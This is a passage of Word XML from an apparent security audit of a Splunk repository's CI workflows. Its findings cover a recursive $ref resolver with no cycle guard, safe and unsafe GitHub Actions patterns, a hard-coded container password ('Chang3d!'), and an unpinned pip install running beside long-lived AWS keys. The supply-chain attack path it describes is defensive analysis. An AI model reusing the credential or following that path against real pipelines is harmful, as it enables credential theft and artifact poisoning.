          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>resolve_refs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> recursively dereferences </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$ref</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with no cycle detection or depth cap. A self-/mutually-referential schema in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mcopenapi_public.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> would cause </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RecursionError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/stack exhaustion. The spec is repo-controlled (CODEOWNERS-gated), and a malicious spec could only reach </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>develop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> via review, so this is a robustness bug, not an attacker primitive. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml.safe_load</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>json.load</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are used correctly (no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml.load</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: track visited </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$ref</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> names and raise/short-circuit on a cycle, or add a recursion-depth guard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-674; CWE-400 Uncontrolled Resource Consumption (2024 CWE Top 25 #24). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-11 — .github/workflows/labeler.yml uses pull_request_target safely (positive control, informational)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Positive control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/labeler.yml:1-18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The workflow triggers on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pull_request_target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (which grants a read/write </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and runs in the base-repo context). Crucially it checks out </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>repository: "splunk/security_content"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>with no `ref:`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, i.e. the base default branch — it does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> check out or execute PR-head code — and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>actions/labeler@v7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only reads changed-file names via the API. Permissions are scoped (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contents: read</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pull-requests: write</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). This is the recommended safe pattern for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pull_request_target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; recording it so the pattern is preserved. Residual: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>actions/labeler@v7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a mutable tag (CI-04) and runs with write token — pin it to a SHA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-12 — OpenAPI example values flagged by secret scanners are placeholders (informational)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: False positive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/response_templates/mcopenapi_public.yml:17,57,1305,1578,2077,2220,2602,2786,3726,3913,4358</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The flagged strings are OpenAPI documentation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>example:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values — UUIDs, sample SHA-256 file hashes, example usernames/emails, and a sample cloud stack host. None are credentials. The spec is consumed only by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>validate_response_templates.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml.safe_load</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → used to build JSON Schemas for structural validation; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>example:</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>servers:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values are never fetched or executed (no SSRF — the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>servers.url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is descriptive only). Confirmed false positives; noting the internal-looking host </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>blueridge.splunkcloud.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for awareness (it is Splunk's own documented sample stack).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Secrets verdict</w:t>
      </w:r>
      <w:r>
        <w:t>: all placeholder/test. See Section C.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / Data Protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-14 — Hard-coded admin password for the throw-away CI Splunk container (informational)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Not exploitable (ephemeral test container).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/unit-testing.yml:64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Chang3d!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the admin password of an ephemeral throwaway Splunk container created per-run and destroyed with the runner; it is not a production credential and grants nothing outside the job. Noted for completeness (detect-secrets flagged it). No remediation required beyond not reusing it anywhere real.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-798 Use of Hard-coded Credentials (2024 CWE Top 25 #22). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / Authentication and Password Management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-16 — bump-yaml.sh follows secure shell practices (positive note)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Positive control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scripts/bump-yaml.sh:1-46</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set -euo pipefail</w:t>
      </w:r>
      <w:r>
        <w:t>, all variable expansions quoted (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"$file"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), extension/existence/readability checks, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yq</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> availability check, and the version string passed to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yq</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>strenv(TODAY)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the environment (not string-concatenated into the expression) — no sed/awk/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yq</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> expression injection via filename or version. This is the secure pattern; recorded as a positive control. (Caveat: it edits files in place, so it must not be run by CI on untrusted input — it is a maintainer helper only.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.6 Software Composition, End-of-Life and Licensing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This area produced 11 unique findings: 1 High, 5 Medium, 5 Low.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DEP-02 — Unpinned pip install in a scheduled job holding long-lived AWS keys that writes the shared app-binaries bucket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 8.6). Exploitability: Conditionally exploitable (highest blast radius).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/update_splunk_tas.yml:21-38 (also .github/workflows/build-response-templates.yml:22, .github/workflows/yaml-validation.yml:47)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Fully unpinned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip install</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of five third-party packages inside a scheduled job that holds long-lived AWS keys and Splunkbase credentials and writes the app binaries every test environment downloads</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19</w:t>
        <w:tab/>
        <w:t xml:space="preserve">      - name: Set up Python</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20</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        uses: actions/setup-python@v6</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21</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        with:</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22</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          python-version: '3.10'  # or the version your script requires</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23</w:t>
        <w:tab/>
        <w:t xml:space="preserve">      - uses: aws-actions/configure-aws-credentials@v6</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24</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        with:</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25</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}</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26</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}</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27</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          aws-region: eu-central-1</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29</w:t>
        <w:tab/>
        <w:t xml:space="preserve">      - name: Install Python dependencies</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30</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        run: |</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31</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          pip3 install boto3 PyYAML xmltodict requests urllib3</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33</w:t>
        <w:tab/>
        <w:t xml:space="preserve">      - name: Run Python Splunk TA checker</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34</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        env:</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35</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          SPLUNK_BASE_USERNAME: ${{ secrets.SPLUNK_BASE_USERNAME }}</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36</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          SPLUNK_BASE_PASSWORD: ${{ secrets.SPLUNK_BASE_PASSWORD }}</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37</w:t>
        <w:tab/>
        <w:t xml:space="preserve">        run: |</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38</w:t>
        <w:tab/>
        <w:t xml:space="preserve">          python .github/workflows/ta_update.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Every day at 06:55 UTC this workflow installs whatever the newest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>boto3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PyYAML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>xmltodict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>urllib3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> happen to be - no version, no hash - *after* AWS access keys have been placed in the environment, and then runs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ta_update.py</w:t>
      </w:r>
      <w:r>
        <w:t>, which downloads TAs from Splunkbase (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ta_update.py:479</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and uploads them to the S3 bucket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>attack-range-appbinaries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ta_update.py:431-432, 490</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). That bucket is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hardcoded_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> origin for all 38 apps in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl.yml:37-258</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng install</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pulls onto every Splunk test container (CI and developer laptops). A single malicious release of any of these five very-high-profile packages (or of one of their own transitive deps, e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>botocore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>s3transfer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>jmespath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
